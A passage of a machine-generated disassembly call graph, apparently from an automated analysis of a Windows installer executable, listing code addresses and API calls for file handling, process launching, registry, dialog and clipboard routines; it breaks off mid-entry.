4388 402b10 SetFilePointer 4387->4388 4390 402b21 4388->4390 4388->4396 4389 403002 16 API calls 4389->4390 4390->4389 4391 402d10 4390->4391 4390->4396 4392 402d35 4391->4392 4393 402d25 4391->4393 4395 405eba 16 API calls 4392->4395 4394 403002 16 API calls 4393->4394 4394->4396 4395->4396 4397 402077 4398 40303e 16 API calls 4397->4398 4399 40207d 4398->4399 4400 40303e 16 API calls 4399->4400 4401 402086 4400->4401 4402 40303e 16 API calls 4401->4402 4403 40208f 4402->4403 4404 40303e 16 API calls 4403->4404 4405 402098 4404->4405 4406 405d3a 23 API calls 4405->4406 4407 4020a4 4406->4407 4414 4069f3 ShellExecuteExW 4407->4414 4409 4020ea 4411 401709 4409->4411 4415 406514 WaitForSingleObject 4409->4415 4412 402109 CloseHandle 4412->4411 4414->4409 4416 40652b 4415->4416 4417 406541 GetExitCodeProcess 4416->4417 4418 40620f 2 API calls 4416->4418 4417->4412 4419 406532 WaitForSingleObject 4418->4419 4419->4416 3741 4036fc SetErrorMode GetVersionExW 3742 403747 GetVersionExW 3741->3742 3744 40377e 3741->3744 3743 403769 3742->3743 3743->3744 3745 4037e5 3744->3745 3746 4068e6 5 API calls 3744->3746 3747 40619e 3 API calls 3745->3747 3746->3745 3748 4037fb lstrlenA 3747->3748 3748->3745 3749 403809 3748->3749 3750 4068e6 5 API calls 3749->3750 3751 403810 3750->3751 3752 4068e6 5 API calls 3751->3752 3753 403817 3752->3753 3754 4068e6 5 API calls 3753->3754 3755 403823 #17 OleInitialize SHGetFileInfoW 3754->3755 3831 406b1a lstrcpynW 3755->3831 3758 403871 GetCommandLineW 3832 406b1a lstrcpynW 3758->3832 3760 403882 3761 4065f6 CharNextW 3760->3761 3762 4038bc CharNextW 3761->3762 3763 4039aa GetTempPathW 3762->3763 3775 4038d5 3762->3775 3833 403ca5 3763->3833 3765 4039c2 3766 4039c6 GetWindowsDirectoryW lstrcatW 3765->3766 3767 403a1c DeleteFileW 3765->3767 3768 403ca5 12 API calls 3766->3768 3843 4033ed GetTickCount GetModuleFileNameW 3767->3843 3770 4039e2 3768->3770 3770->3767 3773 4039e6 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3770->3773 3771 4065f6 CharNextW 3771->3775 3772 403a2f 3779 4065f6 CharNextW 3772->3779 3782 403ab2 3772->3782 3816 403aa4 3772->3816 3774 403ca5 12 API calls 3773->3774 3777 403a14 3774->3777 3775->3763 3775->3771 3778 403996 3775->3778 3777->3767 3777->3782 3928 406b1a lstrcpynW 3778->3928 3794 403a4e 3779->3794 3951 4036d2 3782->3951 3784 403bf9 3786 406aa8 MessageBoxIndirectW 3784->3786 3785 403c0c 3787 403c04 ExitProcess 3785->3787 3788 403c15 GetCurrentProcess OpenProcessToken 3785->3788 3786->3787 3792 403c61 3788->3792 3793 403c2d LookupPrivilegeValueW AdjustTokenPrivileges 3788->3793 3789 403a78 3929 406638 3789->3929 3790 403ab9 3797 4064fc 5 API calls 3790->3797 3796 4068e6 5 API calls 3792->3796 3793->3792 3794->3789 3794->3790 3799 403c68 3796->3799 3800 403abe lstrcatW 3797->3800 3801 403c7d ExitWindowsEx 3799->3801 3804 403c8a 3799->3804 3802 403ae2 lstrcatW lstrcmpiW 3800->3802 3803 403ad3 lstrcatW 3800->3803 3801->3787 3801->3804 3802->3782 3805 403b09 3802->3805 3803->3802 3807 401533 89 API calls 3804->3807 3808 403b12 3805->3808 3809 403b19 3805->3809 3807->3787 3811 405e3e 4 API calls 3808->3811 3812 405e1e 2 API calls 3809->3812 3810 403a99 3945 406b1a lstrcpynW 3810->3945 3814 403b17 3811->3814 3815 403b1e SetCurrentDirectoryW 3812->3815 3814->3815 3817 403b41 3815->3817 3818 403b32 3815->3818 3871 405a3e 3816->3871 3947 406b1a lstrcpynW 3817->3947 3946 406b1a lstrcpynW 3818->3946 3821 405eba 16 API calls 3822 403b71 DeleteFileW 3821->3822 3823 403b7c CopyFileW 3822->3823 3828 403b4f 3822->3828 3823->3828 3824 403bd5 3826 40623d 34 API calls 3824->3826 3825 40623d 34 API calls 3825->3828 3826->3782 3827 405eba 16 API calls 3827->3828 3828->3821 3828->3824 3828->3825 3828->3827 3830 403bc0 CloseHandle 3828->3830 3948 4066d6 CreateProcessW 3828->3948 3830->3828 3831->3758 3832->3760 3834 406d3d 5 API calls 3833->3834 3836 403cb1 3834->3836 3835 403cbb 3835->3765 3836->3835 3837 406556 3 API calls 3836->3837 3838 403cc3 3837->3838 3839 405e1e 2 API calls 3838->3839 3840 403cc9 3839->3840 3841 406a56 2 API calls 3840->3841 3842 403cd4 3841->3842 3842->3765 3958 40691b GetFileAttributesW CreateFileW 3843->3958 3845 40342f 3846 40343c 3845->3846 3959 406b1a lstrcpynW 3845->3959 3846->3772 3848 403452 3960 406d10 lstrlenW 3848->3960 3852 403463 GetFileSize 3862 40347c 3852->3862 3868 40356a 3852->3868 3854 40311b ReadFile 3854->3862 3855 4035ba GlobalAlloc 3976 403131 SetFilePointer 3855->3976 3856 403579 3856->3846 3856->3855 3977 403131 SetFilePointer 3856->3977 3857 403638 3859 403389 6 API calls 3857->3859 3859->3846 3861 403596 3864 406948 ReadFile 3861->3864 3862->3846 3862->3854 3862->3857 3865 403389 6 API calls 3862->3865 3862->3868 3863 4035d7 3866 403148 30 API calls 3863->3866 3867 4035a8 3864->3867 3865->3862 3869 4035e6 3866->3869 3867->3846 3867->3855 3965 403389 3868->3965 3869->3846 3869->3869 3870 403616 SetFilePointer 3869->3870 3870->3846 3872 4068e6 5 API calls 3871->3872 3873 405a52 3872->3873 3874 405a5b 3873->3874 3875 405a6d 3873->3875 3990 40661f wsprintfW 3874->3990 3876 406977 3 API calls 3875->3876 3877 405a9c 3876->3877 3879 405abb lstrcatW 3877->3879 3881 406977 3 API calls 3877->3881 3880 405a6b 3879->3880 3982 40597f 3880->3982 3881->3879 3884 406638 18 API calls 3885 405aed 3884->3885 3886 405b87 3885->3886 3888 406977 3 API calls 3885->3888 3887 406638 18 API calls 3886->3887 3889 405b8d 3887->3889 3890 405b20 3888->3890 3891 405b9d LoadImageW 3889->3891 3892 405eba 16 API calls 3889->3892 3890->3886 3895 405b44 lstrlenW 3890->3895 3898 4065f6 CharNextW 3890->3898 3893 405c4a 3891->3893 3894 405bcd RegisterClassW 3891->3894 3892->3891 3897 401533 89 API calls 3893->3897 3896 405c01 SystemParametersInfoW CreateWindowExW 3894->3896 3927 405bfa 3894->3927 3899 405b54 lstrcmpiW 3895->3899 3900 405b7a 3895->3900 3896->3893 3901 405c50 3897->3901 3903 405b3f 3898->3903 3899->3900 3904 405b64 GetFileAttributesW 3899->3904 3902 406556 3 API calls 3900->3902 3905 40597f 17 API calls 3901->3905 3901->3927 3906 405b80 3902->3906 3903->3895 3907 405b70 3904->3907 3909 405c5d 3905->3909 3991 406b1a lstrcpynW 3906->3991 3907->3900 3908 406d10 2 API calls 3907->3908 3908->3900 3911 405c69 ShowWindow 3909->3911 3912 405ceb 3909->3912 3914 40619e 3 API calls 3911->3914 3913 405864 92 API calls 3912->3913 3915 405cf1 3913->3915 3916 405c81 3914->3916 3917 405cf5 3915->3917 3918 405d0f 3915->3918 3919 405c8f GetClassInfoW 3916->3919 3920 40619e 3 API calls 3916->3920 3924 401533 89 API calls 3917->3924 3917->3927 3921 401533 89 API calls 3918->3921 3922 405ca2 GetClassInfoW RegisterClassW 3919->3922 3923 405cb8 DialogBoxParamW 3919->3923 3920->3919 3925 405d16 3921->3925 3922->3923 3926 401533 89 API calls 3923->3926 3924->3927 3925->3925 3926->3927 3927->3782 3928->3763 3993 406b1a lstrcpynW 3929->3993 3931 406649 3932 406bc5 4 API calls 3931->3932 3933 40664f 3932->3933 3934 403a86 3933->3934 3935 406d3d 5 API calls 3933->3935 3934->3782 3944 406b1a lstrcpynW 3934->3944 3941 40665b 3935->3941 3936 40668b lstrlenW 3937 406697 3936->3937 3936->3941 3939 406556 3 API calls 3937->3939 3938 4065cf 2 API calls 3938->3941 3940 40669c GetFileAttributesW 3939->3940 3940->3934 3942 4066a8 3940->3942 3941->3934 3941->3936 3941->3938 3943 406d10 2 API calls 3941->3943 3942->3934 3943->3936 3944->3810 3945->3816 3946->3817 3947->3828 3949 406715 3948->3949 3950 406709 CloseHandle 3948->3950 3949->3828 3950->3949 3952 4036ea 3951->3952 3953 4036dc CloseHandle 3951->3953 3994 403d13 3952->3994 3953->3952 3958->3845 3959->3848 3961 406d1f 3960->3961 3962 403458 3961->3962 3963 406d25 CharPrevW 3961->3963 3964 406b1a lstrcpynW 3962->3964 3963->3961 3963->3962 3964->3852 3966 403390 3965->3966 3967 4033a8 3965->3967 3968 4033a0 3966->3968 3969 403399 DestroyWindow 3966->3969 3970 4033b1 3967->3970 3971 4033b9 GetTickCount 3967->3971 3968->3856 3969->3968 3978 40620f 3970->3978 3973 4033c7 CreateDialogParamW ShowWindow 3971->3973 3974 4033ec 3971->3974 3973->3974 3974->3856 3976->3863 3977->3861 3979 406221 PeekMessageW 3978->3979 3980 406217 DispatchMessageW 3979->3980 3981 4033b8 3979->3981 3980->3979 3981->3856 3983 405992 3982->3983 3992 40661f wsprintfW 3983->3992 3985 405a0b 3986 405d1b 17 API calls 3985->3986 3988 405a10 3986->3988 3987 405a39 3987->3884 3988->3987 3989 405eba 16 API calls 3988->3989 3989->3988 3990->3880 3991->3886 3992->3985 3993->3931 3995 403d21 3994->3995 3996 4036ef 3995->3996 3997 403d26 FreeLibrary GlobalFree 3995->3997 3998 406719 3996->3998 3997->3996 3997->3997 3999 406638 18 API calls 3998->3999 4000 40673b 3999->4000 4001 406744 DeleteFileW 4000->4001 4002 40675b 4000->4002 4003 4036fb OleUninitialize 4001->4003 4002->4003 4005 40687b 4002->4005 4037 406b1a lstrcpynW 4002->4037 4003->3784 4003->3785 4005->4003 4009 4065cf 2 API calls 4005->4009 4006 406783 4007 40679b 4006->4007 4008 40678d lstrcatW 4006->4008 4011 406d10 2 API calls 4007->4011 4010 4067a1 4008->4010 4012 406898 4009->4012 4013 4067b2 lstrcatW 4010->4013 4015 4067ba lstrlenW FindFirstFileW 4010->4015 4011->4010 4012->4003 4014 40689c 4012->4014 4013->4015 4016 406556 3 API calls 4014->4016 4015->4005 4024 4067e3 4015->4024 4017 4068a2 4016->4017 4018 406585 5 API calls 4017->4018 4019 4068ae 4018->4019 4021 4068d1 4019->4021 4022 4068b2 4019->4022 4020 40685d FindNextFileW 4020->4024 4025 406874 FindClose 4020->4025 4026 405d3a 23 API calls 4021->4026 4022->4003 4027 405d3a 23 API calls 4022->4027 4024->4020 4031 406719 58 API calls 4024->4031 4034 406829 4024->4034 4038 406b1a lstrcpynW 4024->4038 4025->4005 4026->4003 4028 4068be 4027->4028 4030 40623d 34 API calls 4028->4030 4032 4068c7 4030->4032 4031->4034 4032->4003 4033 405d3a 23 API calls 4033->4020 4034->4020 4034->4033 4035 405d3a 23 API calls 4034->4035 4036 40623d 34 API calls 4034->4036 4039 406585 4034->4039 4035->4034 4036->4034 4037->4006 4038->4024 4040 406b9d 2 API calls 4039->4040 4041 406591 4040->4041 4042 4065b3 4041->4042 4043 4065a1 RemoveDirectoryW 4041->4043 4044 4065a9 DeleteFileW 4041->4044 4042->4034 4045 4065af 4043->4045 4044->4045 4045->4042 4046 4065be SetFileAttributesW 4045->4046 4046->4042 4420 402e7c SendMessageW 4421 402e94 InvalidateRect 4420->4421 4422 402ea1 4420->4422 4421->4422 4423 4025ff 4424 402608 4423->4424 4425 40262f 4423->4425 4426 4030c1 16 API calls 4424->4426 4427 40303e 16 API calls 4425->4427 4429 40260f 4426->4429 4428 402636 4427->4428 4434 40307c 4428->4434 4431 402648 4429->4431 4432 40303e 16 API calls 4429->4432 4433 40261c RegDeleteValueW RegCloseKey 4432->4433 4433->4431 4435 403089 4434->4435 4436 403090 4434->4436 4435->4431 4436->4435 4438 40141e 4436->4438 4439 4062d8 RegOpenKeyExW 4438->4439 4440 40145b 4439->4440 4441 40146f RegEnumValueW 4440->4441 4446 401493 4440->4446 4449 401514 4440->4449 4442 401503 RegCloseKey 4441->4442 4441->4446 4442->4449 4443 4014ce RegEnumKeyW 4444 4014d8 RegCloseKey 4443->4444 4443->4446 4445 4068e6 5 API calls 4444->4445 4447 4014e9 4445->4447 4446->4442 4446->4443 4446->4444 4448 40141e 6 API calls 4446->4448 4447->4449 4450 4014ed RegDeleteKeyW 4447->4450 4448->4446 4449->4435 4450->4449 4451 401000 4452 401039 BeginPaint GetClientRect 4451->4452 4453 40100a DefWindowProcW 4451->4453 4455 40110f 4452->4455 4456 40119a 4453->4456 4457 401117 4455->4457 4458 40107e CreateBrushIndirect FillRect DeleteObject 4455->4458 4459 401185 EndPaint 4457->4459 4460 40111d CreateFontIndirectW 4457->4460 4458->4455 4459->4456 4460->4459 4461 401130 6 API calls 4460->4461 4461->4459 4462 401d01 4466 401d0f 4462->4466 4470 401d5d 4462->4470 4463 401d67 4469 401709 4463->4469 4482 406b1a lstrcpynW 4463->4482 4464 401d8c GlobalAlloc 4467 405eba 16 API calls 4464->4467 4465 401d50 4468 405eba 16 API calls 4465->4468 4466->4465 4472 401d1e 4466->4472 4467->4469 4468->4470 4470->4463 4470->4464 4479 406b1a lstrcpynW 4472->4479 4474 401d79 GlobalFree 4474->4469 4475 401d2d 4480 406b1a lstrcpynW 4475->4480 4477 401d3c 4481 406b1a lstrcpynW 4477->4481 4479->4475 4480->4477 4481->4469 4482->4474 4483 401b03 4484 403002 16 API calls 4483->4484 4485 401b0a 4484->4485 4486 403002 16 API calls 4485->4486 4487 401b15 4486->4487 4488 40303e 16 API calls 4487->4488 4489 401b20 lstrlenW 4488->4489 4490 401b3c 4489->4490 4491 401b67 4489->4491 4490->4491 4495 406b1a lstrcpynW 4490->4495 4493 401b5b 4493->4491 4494 401b5f lstrlenW 4493->4494 4494->4491 4495->4493 4496 401c04 4497 403002 16 API calls 4496->4497 4498 401c0e 4497->4498 4499 403002 16 API calls 4498->4499 4500 401bb2 4499->4500 4501 404085 4502 4040c2 4501->4502 4503 4040ac 4501->4503 4505 4040cc GetDlgItem 4502->4505 4513 40413f 4502->4513 4562 406a3a GetDlgItemTextW 4503->4562 4507 4040e4 4505->4507 4506 4040b7 4509 406d3d 5 API calls 4506->4509 4511 4040f8 SetWindowTextW 4507->4511 4514 406bc5 4 API calls 4507->4514 4508 40415e 4510 4040bd 4508->4510 4564 406a3a GetDlgItemTextW 4508->4564 4509->4510 4519 40575b 8 API calls 4510->4519 4515 40551a 17 API calls 4511->4515 4513->4508 4517 405eba 16 API calls 4513->4517 4520 4040ee 4514->4520 4521 404115 4515->4521 4516 404255 4522 406638 18 API calls 4516->4522 4518 4041ba SHBrowseForFolderW 4517->4518 4518->4508 4525 4041d5 CoTaskMemFree 4518->4525 4526 404416 4519->4526 4520->4511 4530 406556 3 API calls 4520->4530 4523 40551a 17 API calls 4521->4523 4524 40425b 4522->4524 4527 404120 4523->4527 4565 406b1a lstrcpynW 4524->4565 4529 406556 3 API calls 4525->4529 4563 405503 SendMessageW 4527->4563 4533 4041e2 4529->4533 4530->4511 4532 404275 4535 4068e6 5 API calls 4532->4535 4536 40421f SetDlgItemTextW 4533->4536 4539 405eba 16 API calls 4533->4539 4534 404126 4537 4068e6 5 API calls 4534->4537 4538 40427b 4535->4538 4536->4508 4537->4510 4548 406d10 2 API calls 4538->4548 4549 4042d0 4538->4549 4551 40432a 4538->4551 4541 404200 lstrcmpiW 4539->4541 4541->4536 4543 404214 lstrcatW 4541->4543 4542 4042dc 4544 406bc5 4 API calls 4542->4544 4543->4536 4545 4042e2 GetDiskFreeSpaceW 4544->4545 4547 40430a MulDiv 4545->4547 4545->4551 4547->4551 4548->4538 4566 406b1a lstrcpynW 4549->4566 4550 4043a1 4553 4043c9 EnableWindow 4550->4553 4555 401533 89 API calls 4550->4555 4551->4550 4567 405560 4551->4567 4553->4510 4556 4043f2 4553->4556 4554 404389 4557 4043a3 SetDlgItemTextW 4554->4557 4558 40438d 4554->4558 4559 4043c7 4555->4559 4556->4510 4575 40553c SendMessageW 4556->4575 4557->4550 4561 405560 19 API calls 4558->4561 4559->4553 4561->4550 4562->4506 4563->4534 4564->4516 4565->4532 4566->4542 4568 405575 4567->4568 4569 405eba 16 API calls 4568->4569 4570 4055fe 4569->4570 4571 405eba 16 API calls 4570->4571 4572 40560a 4571->4572 4573 405eba 16 API calls 4572->4573 4574 405616 lstrlenW wsprintfW SetDlgItemTextW 4573->4574 4574->4554 4575->4510 4576 73471000 4588 73471d68 4576->4588 4579 7347108b 4580 73471b68 CharNextW 4579->4580 4582 73471091 CreateProcessW 4580->4582 4581 73471052 4581->4579 4583 73471b68 CharNextW 4581->4583 4585 734710d4 WaitForSingleObject GetExitCodeProcess CloseHandle CloseHandle 4582->4585 4586 7347110b 4582->4586 4583->4581 4587 73471105 ExitProcess 4585->4587 4586->4587 4589 7347101b GetCommandLineW lstrcpynW 4588->4589 4589->4581 4590 401b88 4591 40303e 16 API calls 4590->4591 4592 401b8f 4591->4592 4593 40303e 16 API calls 4592->4593 4594 401b98 4593->4594 4595 401ba0 lstrcmpiW 4594->4595 4596 401ba8 lstrcmpW 4594->4596 4597 401bae 4595->4597 4596->4597 4598 403d8a 4599 403ec4 4598->4599 4600 403d9f 4598->4600 4601 403ed2 4599->4601 4602 403f45 4599->4602 4604 40551a 17 API calls 4600->4604 4609 403eff GetDlgItem SendMessageW EnableWindow 4601->4609 4617 403f40 4601->4617 4603 403f50 GetDlgItem 4602->4603 4602->4617 4606 403f72 4603->4606 4607 404013 4603->4607 4608 403e0e 4604->4608 4605 40575b 8 API calls 4620 404058 4605->4620 4613 403fa2 SendMessageW LoadCursorW SetCursor 4606->4613 4606->4617 4611 404024 4607->4611 4607->4617 4610 40551a 17 API calls 4608->4610 4627 40553c SendMessageW 4609->4627 4614 403e1d CheckDlgButton EnableWindow GetDlgItem 4610->4614 4615 404043 4611->4615 4616 40402c SendMessageW 4611->4616 4628 4069f3 ShellExecuteExW 4613->4628 4626 405503 SendMessageW 4614->4626 4615->4620 4621 404048 SendMessageW 4615->4621 4616->4615 4617->4605 4621->4620 4622 404005 LoadCursorW SetCursor 4622->4607 4623 403e50 SendMessageW 4624 403e75 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4623->4624 4625 403e6c GetSysColor 4623->4625 4624->4620 4625->4624 4626->4623 4627->4617 4628->4622 4629 40568c lstrlenW WideCharToMultiByte 4630 401e8e 4631 403002 16 API calls 4630->4631 4632 401e94 IsWindow 4631->4632 4633 401bb2 4632->4633 3495 404f92 3496 404fb1 3495->3496 3497 405133 3495->3497 3496->3497 3500 404fbd 3496->3500 3498 405147 GetDlgItem GetDlgItem 3497->3498 3499 405180 3497->3499 3501 40551a 17 API calls 3498->3501 3502 4051d7 3499->3502 3513 401399 89 API calls 3499->3513 3503 404fc2 SetWindowPos 3500->3503 3504 404fdc 3500->3504 3505 40516a SetClassLongW 3501->3505 3507 4054e8 SendMessageW 3502->3507 3514 40512e 3502->3514 3506 40511f 3503->3506 3508 404fe1 ShowWindow 3504->3508 3509 40502f 3504->3509 3512 401533 89 API calls 3505->3512 3520 40575b 8 API calls 3506->3520 3535 4051e9 3507->3535 3508->3506 3515 405006 GetWindowLongW 3508->3515 3510 405051 3509->3510 3511 405037 DestroyWindow 3509->3511 3517 405056 SetWindowLongW 3510->3517 3518 405069 3510->3518 3516 405468 3511->3516 3512->3499 3519 4051b0 3513->3519 3515->3506 3521 405022 ShowWindow 3515->3521 3516->3514 3526 40549b ShowWindow 3516->3526 3517->3514 3518->3506 3524 405075 GetDlgItem 3518->3524 3519->3502 3525 4051b4 SendMessageW 3519->3525 3520->3514 3521->3506 3522 401533 89 API calls 3522->3535 3523 40546a DestroyWindow EndDialog 3523->3516 3527 405091 SendMessageW IsWindowEnabled 3524->3527 3528 4050b4 3524->3528 3525->3514 3526->3514 3527->3514 3530 4050b0 3527->3530 3531 4050c3 3528->3531 3533 405106 SendMessageW 3528->3533 3534 4050d5 3528->3534 3542 4050bb 3528->3542 3529 405eba 16 API calls 3529->3535 3530->3528 3531->3533 3531->3542 3532 405958 SendMessageW 3536 405104 3532->3536 3533->3506 3537 4050ec 3534->3537 3538 4050de 3534->3538 3535->3514 3535->3522 3535->3523 3535->3529 3541 40551a 17 API calls 3535->3541 3544 40551a 17 API calls 3535->3544 3557 4053aa DestroyWindow 3535->3557 3536->3506 3540 401533 89 API calls 3537->3540 3571 401533 3538->3571 3543 4050f3 3540->3543 3541->3535 3542->3532 3543->3506 3543->3542 3545 40526d GetDlgItem 3544->3545 3546 405294 ShowWindow KiUserCallbackDispatcher KiUserCallbackDispatcher EnableWindow 3545->3546 3550 405288 3545->3550 3546->3550 3547 4052e9 GetSystemMenu EnableMenuItem SendMessageW 3548 405316 SendMessageW 3547->3548 3547->3550 3548->3550 3550->3546 3550->3547 3566 405503 SendMessageW 3550->3566 3567 405d1b 3550->3567 3570 406b1a lstrcpynW 3550->3570 3553 405348 lstrlenW 3554 405eba 16 API calls 3553->3554 3555 405362 SetWindowTextW 3554->3555 3556 401399 89 API calls 3555->3556 3556->3535 3557->3516 3558 4053c4 CreateDialogParamW 3557->3558 3558->3516 3559 4053f7 3558->3559 3560 40551a 17 API calls 3559->3560 3561 405402 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3560->3561 3562 401399 89 API calls 3561->3562 3563 405448 3562->3563 3563->3514 3564 405450 ShowWindow 3563->3564 3565 4054e8 SendMessageW 3564->3565 3565->3516 3566->3550 3568 405eba 16 API calls 3567->3568 3569 405d29 SetWindowTextW 3568->3569 3569->3550 3570->3553 3572 401399 89 API calls 3571->3572 3573 401547 3572->3573 3573->3542 4634 40211b 4635 40303e 16 API calls 4634->4635 4636 402121 4635->4636 4637 405d3a 23 API calls 4636->4637 4638 40212b 4637->4638 4639 4066d6 2 API calls 4638->4639 4640 402131 4639->4640 4641 40215b 4640->4641 4642 406514 5 API calls 4640->4642 4644 401709 4640->4644 4643 402110 CloseHandle 4641->4643 4641->4644 4645 40214b 4642->4645 4643->4644 4645->4641 4647 40661f wsprintfW 4645->4647 4647->4641 4074 40219d 4075 40303e 16 API calls 4074->4075 4076 4021a4 4075->4076 4077 4068e6 5 API calls 4076->4077 4078 4021b5 GetFileVersionInfoSizeW 4077->4078 4079 402ea5 4078->4079 4080 4021ce GlobalAlloc 4078->4080 4080->4079 4081 4021e3 4080->4081 4082 4068e6 5 API calls 4081->4082 4083 4021ea 4082->4083 4084 4068e6 5 API calls 4083->4084 4086 4021f3 4084->4086 4085 40224e GlobalFree 4085->4079 4086->4085 4091 40661f wsprintfW 4086->4091 4088 402237 4092 40661f wsprintfW 4088->4092 4090 40224c 4090->4085 4091->4088 4092->4090 4648 40291d 4649 403002 16 API calls 4648->4649 4654 40292e 4649->4654 4650 402aa2 SetFilePointer 4651 402aee 4653 402980 ReadFile 4653->4650 4653->4654 4654->4650 4654->4651 4654->4653 4655 406948 ReadFile 4654->4655 4656 402ae4 4654->4656 4657 4029c5 MultiByteToWideChar 4654->4657 4658 406484 5 API calls 4654->4658 4660 4029f6 SetFilePointer MultiByteToWideChar 4654->4660 4655->4654 4661 40661f wsprintfW 4656->4661 4657->4654 4658->4654 4660->4654 4661->4651 4662 40441e GetDlgItem GetDlgItem 4663 404472 7 API calls 4662->4663 4670 404698 4662->4670 4664 404515 DeleteObject 4663->4664 4665 404508 SendMessageW 4663->4665 4667 404524 4664->4667 4665->4664 4666 4047cf 4668 404814 4666->4668 4669 4048a9 4666->4669 4671 405eba 16 API calls 4667->4671 4672 404562 4667->4672 4673 4048fe 4668->4673 4681 404833 SendMessageW 4668->4681 4674 4048d4 4669->4674 4675 4048b8 SendMessageW 4669->4675 4670->4666 4678 4056da 5 API calls 4670->4678 4693 40472a 4670->4693 4679 40453a SendMessageW SendMessageW 4671->4679 4680 40551a 17 API calls 4672->4680 4676 40575b 8 API calls 4673->4676 4677 4048de 4674->4677 4691 404914 4674->4691 4675->4673 4683 404b26 4676->4683 4684 4048e7 ImageList_Destroy 4677->4684 4685 4048ee 4677->4685 4678->4693 4679->4667 4686 40457a 4680->4686 4681->4673 4687 404850 SendMessageW 4681->4687 4682 4047b7 SendMessageW 4682->4666 4684->4685 4685->4673 4688 4048f7 GlobalFree 4685->4688 4689 40551a 17 API calls 4686->4689 4690 404869 4687->4690 4688->4673 4701 404586 4689->4701 4696 40487f SendMessageW 4690->4696 4699 4054b6 89 API calls 4691->4699 4707 40494b 4691->4707 4710 404add 4691->4710 4692 404af4 ShowWindow GetDlgItem ShowWindow 4692->4673 4693->4666 4693->4682 4694 404665 GetWindowLongW SetWindowLongW 4695 40467b 4694->4695 4697 404692 4695->4697 4698 404682 ShowWindow 4695->4698 4696->4691 4715 405503 SendMessageW 4697->4715 4698->4697 4699->4707 4700 4049a3 4711 404a93 4700->4711 4713 404a39 SendMessageW SendMessageW 4700->4713 4701->4694 4702 4045de SendMessageW 4701->4702 4703 404661 4701->4703 4705 40461a SendMessageW 4701->4705 4706 40462d SendMessageW 4701->4706 4702->4701 4703->4694 4703->4695 4705->4701 4706->4701 4707->4700 4709 404989 SendMessageW 4707->4709 4708 404aaf InvalidateRect 4712 404abe 4708->4712 4709->4700 4710->4673 4710->4692 4711->4708 4711->4712 4712->4710 4714 405560 19 API calls 4712->4714 4713->4700 4714->4710 4715->4670 4716 401aa1 4717 401aa2 4716->4717 4718 40303e 16 API calls 4717->4718 4719 401aa7 4718->4719 4720 406719 65 API calls 4719->4720 4721 401ab1 4720->4721 4722 402ba3 4723 40303e 16 API calls 4722->4723 4724 402bb2 4723->4724 4725 402bc9 4724->4725 4726 40303e 16 API calls 4724->4726 4727 406b9d 2 API calls 4725->4727 4726->4725 4728 402bcf 4727->4728 4750 40691b GetFileAttributesW CreateFileW 4728->4750 4730 402cb7 4734 402cc0 DeleteFileW 4730->4734 4735 402ccf 4730->4735 4731 402bdc 4731->4730 4732 402c9f 4731->4732 4733 402bfd GlobalAlloc 4731->4733 4737 403148 30 API calls 4732->4737 4733->4732 4736 402c1d 4733->4736 4734->4735 4751 403131 SetFilePointer 4736->4751 4739 402cac CloseHandle 4737->4739 4739->4730 4740 402c23 4741 40311b ReadFile 4740->4741 4742 402c2d GlobalAlloc 4741->4742 4743 402c43 4742->4743 4744 402c84 4742->4744 4746 403148 30 API calls 4743->4746 4745 406a0b WriteFile 4744->4745 4747 402c93 GlobalFree 4745->4747 4749 402c52 4746->4749 4747->4732 4748 402c7a GlobalFree 4748->4744 4749->4748 4750->4731 4751->4740 4752 73471121 4753 7347114e 73 API calls 4752->4753 4754 7347114c 4753->4754 3597 402728 3608 4030c1 3597->3608 3600 40303e 16 API calls 3601 40273b 3600->3601 3602 402748 RegQueryValueExW 3601->3602 3606 401709 3601->3606 3603 402772 3602->3603 3604 40276b 3602->3604 3605 40271c RegCloseKey 3603->3605 3603->3606 3604->3603 3613 40661f wsprintfW 3604->3613 3605->3606 3609 40303e 16 API calls 3608->3609 3610 4030d9 3609->3610 3611 4062d8 RegOpenKeyExW 3610->3611 3612 402732 3611->3612 3612->3600 3613->3603 4755 402b28 4756 402b2e 4755->4756 4757 402b36 FindClose 4756->4757 4758 402ea1 4756->4758 4757->4758 4759 4025ac 4760 40303e 16 API calls 4759->4760 4761 4025bd 4760->4761 4762 40303e 16 API calls 4761->4762 4763 4025c6 4762->4763 4764 40303e 16 API calls 4763->4764 4765 4025cf GetPrivateProfileStringW 4764->4765 4766 4025f4 4765->4766 4767 401ead 4768 403002 16 API calls 4767->4768 4769 401eb4 4768->4769 4770 403002 16 API calls 4769->4770 4771 401ebd GetDlgItem 4770->4771 3126 404b30 3127 404cd9 3126->3127 3128 404b4d GetDlgItem GetDlgItem GetDlgItem 3126->3128 3130 404ce1 GetDlgItem CreateThread CloseHandle 3127->3130 3131 404d25 3127->3131 3172 405503 SendMessageW 3128->3172 3133 404d0d 3130->3133 3234 405864 OleInitialize 3130->3234 3134 404d56 3131->3134 3135 404d2d 3131->3135 3132 404bc6 3143 404bcd GetClientRect GetSystemMetrics SendMessageW SendMessageW 3132->3143 3177 40575b 3133->3177 3136 404da4 3134->3136 3137 404d5e 3134->3137 3135->3133 3139 404d39 ShowWindow ShowWindow 3135->3139 3136->3133 3147 404db7 SendMessageW 3136->3147 3141 404d67 3137->3141 3142 404d7a ShowWindow 3137->3142 3191 405503 SendMessageW 3139->3191 3192 405958 3141->3192 3142->3141 3144 404d91 3142->3144 3145 404c31 3143->3145 3146 404c1d SendMessageW SendMessageW 3143->3146 3195 405d3a 3144->3195 3150 404c43 3145->3150 3151 404c39 SendMessageW 3145->3151 3146->3145 3152 404d1b 3147->3152 3153 404dd5 CreatePopupMenu 3147->3153 3173 40551a 3150->3173 3151->3150 3206 405eba 3153->3206 3155 404d54 3155->3133 3157 404c55 3159 404c90 GetDlgItem SendMessageW 3157->3159 3160 404c5e ShowWindow 3157->3160 3159->3152 3166 404cbc SendMessageW SendMessageW 3159->3166 3163 404c74 ShowWindow 3160->3163 3164 404c7f 3160->3164 3161 404e09 GetWindowRect 3162 404e1d TrackPopupMenu 3161->3162 3162->3152 3165 404e3f 3162->3165 3163->3164 3176 405503 SendMessageW 3164->3176 3167 404e53 SendMessageW 3165->3167 3166->3152 3167->3167 3169 404e6f OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3167->3169 3170 404e9b SendMessageW 3169->3170 3170->3170 3171 404ec9 GlobalUnlock SetClipboardData CloseClipboard 3170->3171 3171->3152 3172->3132 3174 405eba 16 API calls 3173->3174 3175 405525 SetDlgItemTextW 3174->3175 3175->3157 3176->3159 3178 405773 GetWindowLongW 3177->3178 3188 